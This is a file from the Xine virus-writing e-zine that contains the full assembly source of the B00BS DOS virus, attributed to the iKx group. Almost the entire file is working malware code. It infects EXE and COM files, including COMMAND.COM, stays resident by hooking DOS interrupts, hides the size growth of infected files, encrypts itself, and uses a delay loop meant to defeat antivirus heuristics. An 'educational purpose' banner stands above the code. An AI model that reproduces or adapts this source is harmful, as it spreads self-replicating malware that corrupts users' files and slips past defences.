/-----------------------------\ | Xine - issue #2 - Phile 029 | \-----------------------------/ ;****************************************************************************** ; THIS IS FOR EDUCATIONAL PURPOSE ONLY Gi0rGeTt0 ; ; Virus name : B00BS ; Author : Unknwon :) ; Group : iKx ; Origin : Italy 1996/97 ; Compiling : Use TASM ; TASM /M2 B00BS.ASM ; TLINK B00BS ; Targets : EXE COM ; Features : stealth via 11h,12h,4eh,4fh,disinfect and infect on the fly ; on opening(3dh,6c00h) and closing(3eh) ,int 24h handler ; TSR by MCB and int21h (48h) ; uses some 386 instructions for some routines (just for fun) ; fucks TBAV,AVP,F-PROT heuristic shits ; improvements : needs a poly engine ; payload : none ; Greetings : to all the guys of the iKx and all the ; other guys on #virus. ; ;****************************************************************************** ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; The file is a EXE .386 CSeg SEGMENT USE16 ASSUME cs:CSeg FileHeaderRecord struc signature dw ? sizemod dw ? msize dw ? relocat dw ? headsize dw ? minalloc dw ? maxalloc dw ? stackseg dw ? stackofs dw ? check dw ? ip dw ? codes dw ? Checksum dw ? checkOvr dw ? FileHeaderRecord ends SearchRecord struc date dw ? time dw ? SearchRecord ends ExecBlockRecord struc Env dw ? Cmd dd ? ExecBlockRecord ends Findrecord struc FindBuf db 128 dup (?) Findofs dw ? Findrecord ends VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2 VIR_LEN = (REAL_CODE - START_TSR) + 1 ; dim virus in memoria VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; dimensione del virus su file already = 0 ; already infected ready = 1 ; ready to be infected com = 2 ; com file exe = 3 ; exe file other = 4 ; other true = 1 false = 0 maxfiles = 26 ; max file no to open , must be (maxfiles*2)/4 integer START_TSR equ $ AfterCryp : call SH SH : pop bp sub bp,3 push ds pop es mov ax,0fe01h int 2fh cmp al,0ffh jne short Novirus YesVirus : db 0e9h jmp_addr dw ? mov ax,ds ; ES = DS = PSP = AX add ax,10h ; PSP + 1 paragraph mov bx,cs:[bp][templateheader.stackseg] add bx,ax cli mov ss,bx mov sp,cs:[bp][templateheader.stackofs] sti mov bx,cs:[bp][templateheader.codes] add bx,ax push bx ; push CS push cs:[bp][templateheader.ip] ; push IP @jump : xor eax,eax xor ebx,ebx xor ecx,ecx xor edx,edx xor esi,esi xor edi,edi xor ebp,ebp retf ; jmp to host CS:IP com_exec : push cs ; COM settings mov si,bp add si,offset @com_buf mov di,100h push di cld movsd jmp short @jump NoVirus : mov es,word ptr ds:[2ch] ; enviroment segment mov word ptr cs:[bp][tmp_COMseg],es push ds mov ax,ds ; DS = PSP dec ax ; AX = MCB mov ds,ax mov bl,02h ; last fit mov ax,5801h int 21h ; set mov bx,VIR_PAR ; malloc mov ah,48h int 21h jnc short malloc ; problems ? push ax dx mov ah,2 mov dl,7 int 21h pop dx ax push ds pop ax mov bx,4d03h mov ds:[0],bh ;'M' xor bh,bh sub word ptr ds:[bx],VIR_PAR inc ax add ax,ds:[bx] mov ds,ax mov word ptr ds:[bx],VIR_PAR-1 mov bl,'Z' mov ds:[0],bl ; Z in last MCB inc ax malloc : mov es,ax dec ax push ax pop ds mov bx,8 mov ds:[1],bx ; owned by dos 0008 mov word ptr ds:[bx],'CS' xor bl,bl ; restore strategy mov ax,5801h int 21h cld xor di,di mov si,bp push cs pop ds mov cx,(VIR_LEN / 4) + 1 rep movsd call clean_x_stack cli xor ax,ax mov ds,ax mov eax,es shl eax,16 mov ax,offset HOOK_21 xchg ds:[84h],eax mov es:TRAPPED_21,eax mov eax,es shl eax,16 mov ax,offset HOOK_2F xchg ds:[0bch],eax mov es:TRAPPED_2F,eax pop ds ; DS = PSP mov es:sleep,FALSE mov es:command_Flag,TRUE mov ax,cs:[bp][tmp_COMseg] mov es:COMseg,ax push ds pop es sti jmp yesvirus tmp_COMseg dw ? HOOK_2F : cmp ah,0feh jne short ChkintWin mov al,0ffh iret ;///// Chkintwin and ChkEndwin disable the virus during installation check in ; win311 and under Msdos prompt in w95 ///// ; Under Msdos prompt only some int21h trap worked :(( i.e 4b ; but 3dh,3eh and some other as all long filenames functions didn't work ; i dunno the reason since i hadn't much time for solving the question ; if someone can explain it let me know pleaze :) ChkintWin : cmp ax,1605h jne short chkendwin mov cs:sleep,TRUE jmp short pass2f ChkEndWin : cmp ax,1606h jne short pass2f mov cs:sleep,FALSE pass2f : db 0eah TRAPPED_2F dd ? HOOK_21 : cmp cs:command_flag,TRUE jne short Check_int call @COMM_COM Check_int : cmp cs:sleep,TRUE je short org_21 cmp ax,cs:[intr_sub_w] ;4b00h je @EXEC00 cmp ax,cs:[intr_sub_w+2] ;4b01h je @LD&EX cmp ah,cs:[intr_sub_b] ;1ah je @SAVEDTA cmp ah,cs:[intr_sub_b+1] ;4eh je @FINDFIRST cmp ah,cs:[intr_sub_b+2] ;4fh je @FINDNEXT cmp ah,cs:[intr_sub_b+3] ;3dh je @OPEN cmp ah,cs:[intr_sub_b+4] ;3eh je @CLOSE cmp ax,cs:[intr_sub_w+4] ;6c00h je @EXTOPEN cmp ah,cs:[intr_sub_b+5] ;11h je @FCB_FIND cmp ah,cs:[intr_sub_b+6] ;12h je @FCB_FIND org_21 : db 0eah TRAPPED_21 dd ? @COMM_COM : pushad push ds es cld mov ax,cs:COMseg mov es,ax xor di,di mov cx,256 @pre_loop : mov eax,'SMOC' @loop_a : scasd jz short @nxt_ck sub di,3 loop @loop_a jmp @fail @nxt_ck : mov eax,'=CEP' scasd jz short @it_is sub di,3 jmp short @pre_loop @it_is : push es pop ds mov si,di push cs pop es mov di,offset Data_Buffer mov cx,256 @loop_b : lodsb or al,al jz short @copy_end stosb loop @loop_b @copy_end : stosb push cs pop ds mov dx,offset Data_Buffer ; DS:DX command.com path mov bx,dx call GetFattrib ; CX attributo jc short @fail push cx dx ds call openfile ; BX handle call FileInfect call closefile pop ds dx cx call SetFattrib @fail : pop es ds popad mov cs:command_flag,FALSE ret @EXEC00 : call CheckIfExe jnz org_21 pushad push es ds ; DS:DX ASCIZ filename call vir_handler call getFattrib jc short @no_inf ; CX attributo push cx ds dx call openfile call FileInfect call closefile pop dx ds cx call SetFattrib @no_inf : call dos_handler pop ds es popad call int21h jmp Intret @LD&EX : push es ds pushad call vir_handler call GetFattrib jc short ex_ld ; CX attributo push cx dx ds call OpenFile jc short ex_ld call FileClean call closefile pop ds dx cx call SetFattrib ex_ld : call dos_handler popad pop ds es push ds dx call int21h pop dx ds pushf push es ds pushad call vir_handler call GetFattrib jc short not_ld ; CX attrib push cx ds dx call OpenFile call FileInfect call closefile pop dx ds cx call SetFattrib not_ld : call dos_handler popad pop ds es popf jmp Intret @OPEN : call CheckIfExe jnz org_21 push es ds pushad call vir_handler call GetFattrib jc short Skip_file ; CX attrib push cx ds dx call OpenFile call FileClean call CloseFile pop dx ds cx call SetFattrib call dos_handler popad pop ds es push ds dx call int21h pop dx ds jc short @no_open xchg ax,bx call PushHandle xchg bx,ax jmp Intret @no_open : pushf cmp al,5 jne short @no_mat push es ds pushad call vir_handler call GetFattrib jc short @a push cx ds dx call OpenFile call FileInfect call CloseFile pop dx ds cx call SetFattrib call dos_handler @a : popad pop ds es @no_mat : popf jmp Intret Skip_file : popad pop ds es call dos_handler jmp org_21 @EXTOPEN : xchg si,dx call CheckIfExe xchg dx,si jnz org_21 push es ds pushad call vir_handler mov dx,si call GetFattrib jc short @aa push cx ds dx call OpenFile call FileClean call closefile pop dx ds cx call SetFattrib @aa : call dos_handler popad pop ds es push ds si call int21h pop dx ds jc @no_open xchg ax,bx call PushHandle ; save handle xchg bx,ax jmp Intret ; // SFT and JFT didn't work in Msdos Prompt :(( // @CLOSE : call Pophandle jc org_21 call vir_handler pushad push ds es push bx mov ax,1220h ; BX handle call int2fh ; ES:DI JFT xor bx,bx mov bl,byte ptr es:[di] mov ax,1216h ; bx entry number for call int2fh ; ES:DI SFT mov byte ptr es:[di+2],2 pop bx call FileInfect pop es ds popad call int21h ; exec int call dos_handler clc jmp Intret @FINDFIRST : push ax cx si di es ; DS:DX find filename pushf mov si,dx push cs pop es mov di,offset findvar cld push di xor ax,ax mov cx,(size Findvar - 2) / 2 rep stosw ; reset Findvar pop di mov ah,60h ; DS:SI filename call Int21h ; ES:DI canonaized mov di,offset findvar + size findvar - 2 mov cx,size findvar - 2 - 1 std mov al,'\' repnz scasb jz short o sub di,3 o : add di,2 mov cs:Findvar.Findofs,di popf pop es di si cx ax @FINDNEXT : call int21h jc Intret FindProc : pushad push ds es pushf mov ds,cs:DTAseg mov si,cs:DTAofs add si,1eh ; DS:SI punta al ; filename nella DTA push cs pop es mov di,cs:findvar.findofs ; ES:DI path filename cld CopyName: movsb cmp byte ptr ds:[si],0 jne short CopyNAme mov byte ptr es:[di],0 ; Findvar now has the ASCIZ filename to pass to Openfile push cs pop ds mov dx,offset Findvar call CheckIfExe jnz short DonotTreat call OpenFile jc short DoNotTreat call CheckXinf cmp file_type,other je short CanClose cmp file_status,already jne short CanClose mov es,DTAseg mov di,DTAofs sub dword ptr es:[di+1ah],vir_true_len - 1 CanClose : call CloseFile DoNotTreat: popf pop es ds popad jmp Intret @SAVEDTA : mov cs:DTAofs,dx mov cs:DTAseg,ds jmp org_21 @FCB_FIND : call int21h pushf push es ax bx les bx,dword ptr cs:DTAofs mov al,byte ptr es:[bx] cmp al,0ffh ; vede se FCB esteso jne short @ok_good add bx,7 @ok_good : pusha push ds es mov ah,47h ; get cur dir mov dl,byte ptr es:[bx] ; drive number push cs pop ds mov si,offset FindVar call int21h ; return ASCIZ directory push cs pop es cld cmp byte ptr ds:[si],0 ; root ? jne short @path mov ax,offset FindVar add ax,3 mov cs:FindVar.FindOfs,ax jmp short @root @path : mov di,offset FindVar xor al,al @@f : scasb ; look for the end of the dirname jnz short @@f mov si,di dec si mov byte ptr es:[si],'\' add di,3 mov es:FindVar.FindOfs,di dec di std @cp : movsb cmp si,offset FindVar jae short @cp @root : mov word ptr es:[offset FindVar+1],'\:' add dl,'A' - 1 mov byte ptr es:[offset FindVar],dl ; drive letter pop es ds popa pusha push ds es ; ES:BX DTA push es pop ds ; DS = ES mov si,1 add si,bx ; file name ds:si push cs pop es mov di,cs:FindVar.FindOfs mov cx,8 cld @lp1 : lodsb cmp al,20h je short @end_1 stosb loop @lp1 @end_1 : mov al,'.' stosb mov cx,3 mov si,9 add si,bx rep movsb xor al,al stosb ; Z terminated push cs pop ds mov dx, offset FindVar ; ASCIZ filename mov bp,bx call CheckIfExe jnz short @not_op call OpenFile jc short @not_op call CheckXinf cmp file_type,other je short @CanClose cmp file_status,already jne short @CanClose mov es,cs:DTAseg sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1 ; real size @CanClose : call CloseFile @not_op : pop es ds popa @NotInf : pop bx ax es popf Intret proc cli push ax pushf pop ax add sp,8 push ax sub sp,6 pop ax sti iret Intret endp int21h proc pushf call dword ptr cs:TRAPPED_21 ret int21h endp int2fh proc pushf call dword ptr cs:TRAPPED_2F ret int2fh endp vir_handler proc cli push eax ds xor ax,ax mov ds,ax mov eax,cs shl eax,16 mov ax,offset critical xchg ds:[90h],eax mov cs:TRAPPED_24,eax pop ds eax sti ret vir_handler endp dos_handler proc push ds ax cli xor ax,ax mov ds,ax db 66h dw 06c7h dw 0090h TRAPPED_24 dd ? ; mov ds:[90h],cs:TRAPPED_24 pop ax ds sti ret dos_handler endp critical proc xor al,al iret critical endp openfile proc mov ah,3dh xor al,al add al,2 ; mov ax,3d02h call int21h mov bx,ax ret ; out : BX handle openFile endp closeFile proc mov ah,3eh ; in : BX handle call int21h ret closefile endp GetFAttrib proc push ax mov ah,43h xor al,al ; mov ax,4300h push ax call int21h ; CX attributo pop ax inc al push cx ; mov ax,4301h push ax call int21h pop ax jc short out_f ; mov ax,4301h mov cx,32 call int21h out_f : pop cx pop ax ; ritorna CX attributo ret ; ritona carry se errore SetFattrib proc push ax ; in CX attributo mov ah,43h xor al,al inc al ; mov ax,4301h call int21h pop ax ret SetFattrib endp GetFAttrib endp FileEnd proc mov ah,42h xor al,al add al,2 ; mov ax,4202h xor cx,cx xor dx,dx call int21h ; DX:AX file size ret FileEnd endp Filestart proc xor cx,cx xor dx,dx Filestart endp FileSeek proc mov ax,4200h call int21h ret FileSeek endp blockread proc mov ah,3fh call int21h ret blockread endp blockwrite proc mov ah,40h call int21h ret blockwrite endp GetDateTime proc mov ah,57h xor al,al ; mov ax,5700h call Int21h mov cs:searchrec.date,dx mov cs:searchrec.time,cx ret GetdateTime endp SetDateTime proc mov dx,cs:searchrec.date mov cx,cs:searchrec.time mov ah,57h xor al,al inc al ; mov ax,5701h call Int21h ret SetdateTime endp commit_file proc mov ah,68h call int21h ; commit file ret commit_file endp clean_x_stack proc mov di,offset searchstack mov cx, (size searchstack) / 4 xor eax,eax rep stosd ret clean_x_stack endp CheckIfExe proc ; DS:DX filename push es di ax push ds pop es cld mov di,dx ; ES:DI filename xor ax,ax FindZ : scasb jnz short FindZ cmp dword ptr [di-5],'exe.' je short is_exe cmp dword ptr [di-5],'EXE.' je short is_exe cmp dword ptr [di-5],'moc.' je short is_exe cmp dword ptr [di-5],'MOC.' is_exe : pop ax di es ret CheckIfExe endp PushHandle proc pushf push ax cx es di push cs pop es mov di,offset SearchStack ; ES:DI SearchStack cld mov cx,maxfiles xor ax,ax repnz scasw jnz short Nofree mov word ptr es:[di-2],bx ; sets handle Nofree: pop di es cx ax popf ret PushHandle endp PopHandle proc push ax cx es di or bx,bx jz short Nofree1 ; BX = 0 ? push cs pop es cld mov di,offset SearchStack mov cx,maxfiles mov ax,bx repnz scasw jnz short Nofree1 mov word ptr es:[di-2],0 ; free handle clc jmp short exitpop Nofree1 : stc Exitpop : pop di es cx ax ret PopHandle endp Calc_check proc push si ; DS = CS xor dx,dx mov si,size fileheader - 4 @chk : add dx,[si+offset fileheader] sub si,2 jnz short @chk pop si ; DX = checksum ret Calc_check endp CheckXinf proc mov file_status,already call Filestart mov cx,size Fileheader mov dx, offset Fileheader call BlockRead mov cx,cs:[MZsig] dec cx cmp fileheader.signature,cx je short IsanExe mov cx,cs:[ZMsig] dec cx cmp fileheader.signature,cx ; vede se e' un file EXE je short IsanExe mov file_type,com call FileEnd ; DX:AX dim file sub ax,VIR_TRUE_LEN - 1 add ax,NONCRYPTED - START_TSR sub ax,3 cmp ax,word ptr fileheader.signature+1 je GotoEnd ; infected jmp Except IsAnExe : mov file_type,exe cmp fileheader.Checksum,40h jne short @good ; not a PE,NE,LE .... mov file_type,other jmp GotoEnd @good : call calc_check cmp dx,fileheader.CheckOvr je GoToEnd ; already infected Cont : call FileEnd ; DX:AX dimens file shl edx,16 mov dx,ax movzx edi,fileheader.msize movzx esi,fileheader.sizemod dec edi imul edi,512 add edi,esi cmp edi,edx ; malloc = filesize je short Except ;//**** SFT and JFT doesnt work in dos7 prompt from w95 :(( ****** /// ;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM ;//**** file but a real EXE Chk_Com : push bx es mov ax,1220h ; BX handle call int2fh ; ES:DI JFT xor bx,bx mov bl,byte ptr es:[di] mov ax,1216h ; bx entry number for call int2fh ; ES:DI SFT cld add di,20h ; go to filename mov eax,'MMOC' scasd jnz short no_com_com mov eax,' DNA' scasd jnz short no_com_com mov ax,'OC' scasw no_com_com : pop es bx jz short except mov file_type,other jmp short GotoEnd except : mov file_status,ready GoToEnd : call FileEnd ret ; DX:AX dimensione file CheckXinf endp FileInfect proc push cs cs pop ds es call CheckXInf ; DX:AX dimens file cmp file_type,other je Infectexit cmp file_status,ready jne infectexit cld mov word ptr f_size,ax ; salva dim per .COM mov si,offset fileheader mov di,offset @com_buf movsd cmp dx,0 ja short @not_less cmp ax,23000 ja short @not_less jmp infectexit @not_less : cmp dx,7 ja Infectexit cld mov si,offset fileheader + 2 mov di,offset templateheader + 2 mov cx,(size fileheader) / 2 - 1 rep movsw push ax dx add ax,VIR_TRUE_LEN adc dx,0 mov cx,512 div cx inc ax ; AX = quoziente DX=resto mov fileheader.msize,ax ; nuova memory size mov fileheader.sizemod,dx ; nuovo memory module pop dx ax add ax,NONCRYPTED - START_TSR adc dx,0 mov cx,16 div cx ; AX:DX = CS:IP mov fileheader.ip,dx push ax xor dx,dx mov ax,VIR_TRUE_LEN add ax,cx add fileheader.ip,ax mov cx,16 div cx sub fileheader.ip,dx mov dx,fileheader.ip dec dx mov first_addr,dx sub dx,NONCRYPTED - START_TSR mov cmp_addr,dx mov dx,ax pop ax sub ax,dx sub ax,fileheader.headsize mov fileheader.codes,ax ; setta CS:IP nuovi mov fileheader.stackseg,ax add fileheader.stackofs,(VIR_PAR + 4) * 16 ; mi metto al sicuro call GetDateTime call calc_check ; dx checksum mov fileheader.checkovr,dx LeaveSo : call FileStart cmp file_type,com jne @exe1 mov jmp_addr,offset com_exec - offset yesvirus - 3 mov byte ptr fileheader,0e9h mov cx,f_size add cx,NONCRYPTED - START_TSR sub cx,3 mov word ptr fileheader+1,cx add cx,102h mov first_addr,cx sub cx,NONCRYPTED - START_TSR mov cmp_addr,cx mov dx,offset FIleheader mov cx,3 call BlockWrite jmp short ordinary @exe1 : mov jmp_addr,0 mov dx,offset Fileheader mov cx,size fileheader call BlockWrite ; scrive header ordinary : call FileEnd call Criptate ; return CX = ; virus lenght mov dx,offset Data_Buffer mov cx,VIR_TRUE_LEN - 1 call BlockWrite call SetDateTime call commit_file InfectExit : ret FileInfect endp FileClean proc push cs pop ds call CheckXInf ; DX:AX dimens file cmp file_type,other je clean_out cmp file_status,already jne clean_out sub ax,size templateheader + 4 ;size @com_buf sbb dx,0 mov cx,dx mov dx,ax call FileSeek mov cx,size templateheader + 4 ;size @com_buf ; read real fileheader mov dx,offset @com_buf call Blockread call FileStart call GetdateTime cmp file_type,com jne short @exe2 mov cx,4 mov dx,offset @com_buf call Blockwrite jmp short ordinary1 @exe2 : mov cx,cs:[MZsig] dec cx mov templateheader.signature,cx mov dx,offset templateHeader mov cx,size templateheader call BlockWrite ordinary1 : call fileEnd sub ax,vir_true_len - 1 sbb dx,0 mov cx,dx mov dx,ax call FileSeek xor cx,cx call Blockwrite call SetDateTime call commit_file clean_out : ret FileClean endp Criptate proc push bx xor bx,bx mov ds,bx mov bx,word ptr ds:[46ch] ; ritorna numero casuale push cs cs pop ds es mov k_code,bl mov k1_code,bl mov si,bx and si,3 cmp si,3 jl short @well xor si,si @well : mov bh,byte ptr [offset cripstyle+si] mov cripmode,bh mov bh,byte ptr [offset uncripstyle+si] mov uncripmode,bh std mov si,offset NONCRYPTED - 1 mov di,offset Data_Buffer + (NONCRYPTED - START_TSR) - 1 @crip : bt si,15 jc short @stop lodsb cripmode db ? k_code db ? ; xor add sub ,k_code stosb jmp short @crip @stop : cld mov si,offset @uncr_code mov di,offset offset Data_Buffer + (NONCRYPTED - START_TSR) mov cx,REAL_CODE - offset @uncr_code rep movsb pop bx ret Criptate endp Cripstyle db 034h ; xor db 04h ; add db 02ch ; sub Uncripstyle db 34h ; xor db 2ch ; sub db 04h ; add Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land ' db '1997 Bari' intr_sub_w dw 4b00h,4b01h,6c00h intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h MZsig dw 'ZM'+1 ZMsig dw 'MZ'+1 NONCRYPTED equ $ @uncr_code : db 0beh first_addr dw ? ; mov si,first_addr @uncr : db 02eh ; xor cs:[si] db 80h uncripmode db ? k1_code db ? mov cx,4000 ; do-nothing loop @m1: inc si ; to waste time dec si ; to loop @m1 ; fuck AVP dec si db 81h db 0feh cmp_addr dw ? ; cmp si, jne short @uncr @end : jmp AfterCryp @com_buf db 4 dup (?) templateheader FileheaderRecord <> ; real file header REAL_CODE equ $ Fileheader FileheaderRecord <> ; header file_status db ? ; infection flag file_type db ? sleep db ? ; flag for Windows 3.X command_flag db ? ; infect command.com ? Searchrec Searchrecord <> ; date & time record SearchStack dw Maxfiles dup (?) ; stack for f-handle FindVar Findrecord <> ; findfirst & findnext SFT db 03bh dup (0) ; System File Table Buffer DTAofs dw ? ; DTA for Findfirst,next DTASeg dw ? COMSeg dw ? ; SEG for command.com f_size dw ? ; com size Data_Buffer db VIR_TRUE_LEN + 16 dup (?) ; Virus temp buffer END_TSR equ $ main : mov ax,ds ; DS = PSP dec ax ; AX = MCB mov ds,ax mov byte ptr ds:[0],'M' sub word ptr ds:[3],VIR_PAR inc ax add ax,ds:[3] mov ds,ax mov byte ptr ds:[0],'Z' ; Z nell'ultimo MCB mov word ptr ds:[1],0008 mov word ptr ds:[3],VIR_PAR-1 mov word ptr ds:[8],'CS' inc ax ; SEG TSR cld mov es,ax xor si,si xor di,di push cs pop ds mov cx,(VIR_LEN / 4) + 1 rep movsd call clean_x_stack cli xor ax,ax mov ds,ax mov eax,es shl eax,16 mov ax,offset HOOK_21 xchg ds:[84h],eax mov es:TRAPPED_21,eax mov eax,es shl eax,16 mov ax,offset HOOK_2F xchg ds:[0bch],eax mov es:TRAPPED_2F,eax mov es:sleep,FALSE mov es:command_flag,FALSE sti mov ax,4c00h int 21h CSeg ends end main